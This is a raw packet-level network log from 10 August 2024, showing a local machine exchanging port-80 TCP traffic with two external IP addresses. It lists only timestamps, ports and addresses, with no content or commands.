Aug 10, 2024 16:12:23.007313967 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.007325888 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.007325888 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.007328033 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.007342100 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.007343054 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.007354975 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.007368088 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.007582903 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.007582903 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.007582903 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.008198977 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.008214951 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.008229017 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.008244991 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:23.008259058 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:23.008275032 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:23.008289099 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:23.008301020 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:23.008301020 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:23.008305073 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:23.008320093 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:23.008335114 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:23.008336067 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:23.008343935 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:23.008356094 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:23.008377075 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:23.008392096 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.008392096 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.009125948 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:23.009140015 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:23.009151936 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:23.009166002 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:23.009181976 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:23.009186029 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:23.009196997 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:23.009211063 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:23.009219885 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:23.009224892 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.009234905 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:23.009238005 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.009253979 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.009263039 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:23.009337902 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.009339094 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.010050058 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.010066032 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.010078907 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.010092974 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.010106087 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.010119915 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.010133028 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.010138988 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.010138988 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.010147095 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.010157108 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.010162115 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.010176897 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.010234118 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.010234118 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.010234118 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.011032104 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.011050940 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.011066914 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.011082888 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.011100054 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.011110067 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.011116982 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:23.011132956 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:23.011138916 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.011149883 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:23.011166096 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:23.011173010 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:23.011173010 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:23.011183977 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:23.011209965 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:23.011238098 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:23.011399031 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.011648893 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:23.011667967 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:23.011707067 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:23.011746883 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:23.011764050 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:23.011780024 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:23.011796951 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:23.011800051 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:23.011815071 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:23.011816978 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:23.011833906 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:23.011843920 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:23.011852026 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:23.011863947 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:23.011872053 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:23.011885881 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:23.011889935 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.011908054 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.011910915 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:23.011924982 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.011970997 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.011970997 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.011987925 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.012672901 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.012690067 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.012706995 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.012722969 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.012739897 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.012757063 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.012773037 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.012789011 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.012804031 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.012819052 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.012819052 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.012819052 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.012819052 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.012820959 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.012837887 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.012854099 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.012942076 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.012942076 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.012942076 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.013504028 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.013521910 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.013537884 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.013555050 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:23.013571024 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:23.013613939 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.013613939 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.013638973 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:23.013638973 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:23.013884068 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:23.013902903 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:23.013921022 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:23.013930082 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:23.013943911 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:23.013966084 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:23.013998032 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:23.014015913 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:23.014034986 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:23.014053106 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:23.014061928 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:23.014084101 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:23.014115095 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:23.014116049 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:23.014134884 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:23.014153004 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:23.014154911 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:23.014172077 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:23.014177084 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:23.014189005 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:23.014190912 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:23.014208078 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:23.014210939 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:23.014230013 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:23.014254093 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:23.014924049 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.014942884 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.014959097 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.014975071 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.014991999 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.015006065 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.015022993 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.015039921 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.015055895 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.015069962 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.015069962 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.015069962 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.015069962 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.015073061 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.015088081 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.015104055 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.015136957 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.015137911 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.015172958 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.015738010 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.015755892 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.015772104 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.015799046 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.015814066 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.015830040 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.015846968 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:23.015863895 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:23.015881062 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:23.015891075 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.015891075 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.015891075 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.015891075 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.015897036 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:23.015907049 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:23.015907049 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:23.015913963 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:23.015933990 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:23.015933990 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:23.015959978 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:23.015989065 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:23.016752005 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:23.016769886 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:23.016784906 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:23.016796112 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:23.016802073 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:23.016809940 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:23.016819954 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:23.016830921 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:23.016836882 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:23.016844988 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:23.016855001 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:23.016860962 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:23.016872883 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:23.016875982 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:23.016889095 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:23.016899109 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:23.016908884 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:23.016910076 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:23.016926050 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:23.016927004 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:23.016943932 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:23.016944885 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:23.016962051 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:23.016966105 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:23.016978979 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:23.017000914 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:23.017615080 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:23.017756939 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:23.017769098 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:23.017779112 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:23.017791033 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:23.017798901 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:23.017802954 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:23.017815113 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:23.017826080 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.017831087 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:23.017837048 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.017847061 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.017848969 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:23.017859936 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.017870903 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.017874002 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:23.017884016 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.017896891 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.017908096 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.017932892 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.017942905 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.017942905 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.017944098 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.018652916 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.018665075 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.018675089 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.018702984 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.018723965 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.021572113 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.021641970 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.021651030 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.021692038 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.021722078 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.021797895 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.021809101 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.021817923 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.021830082 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.021838903 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.021847963 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.021866083 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.021878958 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.022042036 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.022052050 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.022083998 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.022092104 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.022180080 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.022191048 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.022223949 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.022286892 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.022296906 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.022306919 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.022329092 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.022336960 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.022413969 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.022423983 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.022433996 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.022445917 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.022453070 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.022461891 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.022469044 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.022492886 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.022676945 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.022686958 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.022696972 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.022707939 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.022715092 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.022726059 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.022732973 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.022751093 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.022766113 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.022938967 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.022977114 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.023062944 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.023072958 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.023083925 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.023092031 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.023101091 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.023107052 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.023117065 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.023128986 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.023139000 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.023149014 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.023156881 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.023168087 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.023181915 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.023528099 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.023536921 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.023547888 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.023559093 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.023565054 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.023575068 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.023581028 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.023590088 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.023602009 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.023607969 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.023617029 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.023623943 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.023633957 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.023643970 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.023648977 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.023670912 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.029562950 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.029572964 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.029583931 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.029611111 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.029637098 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.029962063 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.029973984 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.029983997 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.029994965 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.030018091 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.030042887 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.030114889 CEST	80	49739	147.45.44.104	192.168.2.4
